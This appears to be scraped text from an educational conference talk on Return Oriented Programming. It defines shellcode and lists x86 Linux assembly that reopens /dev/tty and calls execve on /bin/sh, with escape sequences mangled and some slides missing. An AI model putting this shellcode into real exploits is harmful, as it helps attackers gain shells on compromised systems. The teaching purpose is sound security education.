Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of. In this talk you will learn how it works, and we will go through some examples to show how it can be used to execute code in contexts where the stack is not executable.
10. 10
TurtleSec
@pati_gallardo
Shellcode
Piece of code, typically in machine code,
that is delivered and executed as a part of an exploit.
Called “shellcode” because a traditional use was
to start a shell, for example sh.
In real exploits it will deliver some kind of mechanism for
further (remote) compromise of the system.
11. 11
TurtleSec
@pati_gallardo
Shellcode - code that gives you shell
int execve(const char *filename,
char *const argv[],
char *const envp[]);
Target Process
Vulnerable
Program
Target Process
/bin/sh
Shellcode
25. 25
TurtleSec
@pati_gallardo
eax
ebx
edx
ecx
Syscall number
1. argument
2. argument
3. argument
0x05
const char *filename
int flags
umode_t mode
open asm
1. "xor eax, eaxnt" // Zero out
2. "mov eax, 0x05nt" // Set eax to syscall number (0x05)
3. "xor ebx, ebxnt" // Zero out
4. "push ebxnt" // Push null terminator
5. "mov ebx, 0x7974742fnt" // "ytt/"
6. "push ebxnt" // Part two of the string
7. "mov ebx, 0x7665642fnt" // "ved/"
8. "push ebxnt" // Part one of the string
9. "mov ebx, espnt" // Put pointer in ebx
10. "xor ecx, ecxnt" // Zero out
11. "xor edx, edxnt" // Zero out
12. "int 0x80nt" // Invoke syscall
32. 32
TurtleSec
@pati_gallardo
1. int main(void) {
2. __asm__(
3. ".intel_syntax noprefixnt"
4. "xor eax, eaxnt" // Zero out
5. "mov eax, 0x06nt" // Set eax to syscall number (0x06)
6. "xor ebx, ebxnt" // Zero out ebx - file descriptor
7. "int 0x80nt" // Invoke syscall
8. "xor eax, eaxnt" // Zero out
9. "mov eax, 0x05nt" // Set eax to syscall number (0x05)
10. "xor ebx, ebxnt" // Zero out
11. "push ebxnt" // Push null terminator
12. "mov ebx, 0x7974742fnt" // "ytt/"
13. "push ebxnt" // Part two of the string
14. "mov ebx, 0x7665642fnt" // "ved/"
15. "push ebxnt" // Part one of the string
16. "mov ebx, espnt" // Put pointer in ebx
17. "xor ecx, ecxnt" // Zero out
18. "xor edx, edxnt" // Zero out
19. "int 0x80nt" // Invoke syscall
20. "xor eax, eaxnt" // Zero out
21. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b)
22. "xor ebx, ebxnt" // Zero out
23. "push ebxnt" // Push null terminator
24. "mov ebx, 0x68732f2fnt" // "hs//"
25. "push ebxnt" // Part two of the string
26. "mov ebx, 0x6e69622fnt" // "nib/"
27. "push ebxnt" // Part one of the string
28. "mov ebx, espnt" // Put pointer in ebx
29. "xor ecx, ecxnt" // Zero out
30. "xor edx, edxnt" // Zero out
31. "int 0x80nt" // Invoke syscall
32. );
33. }
execve
open
close
shellcode_asm.c
@pati_gallardo